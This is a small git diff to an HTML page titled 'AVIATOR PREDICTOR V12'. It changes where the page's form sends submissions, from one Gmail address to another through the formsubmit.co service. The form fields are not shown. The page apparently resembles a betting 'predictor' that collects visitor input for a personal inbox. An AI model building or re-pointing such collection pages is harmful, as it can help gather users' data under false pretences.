--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 </head>
 <body>
     
-    <form action="https://formsubmit.co/muloihanetii@gmail.com" method="Post">
+    <form action="https://formsubmit.co/ghodzeus@gmail.com" method="Post">
         <br>
         <img src="img/[removal.ai]_f5589063-dc09-4119-880d-da38193b76a2-download.png" alt="X">
         <figcaption><b>AVIATOR PREDICTOR V12</b></figcaption>
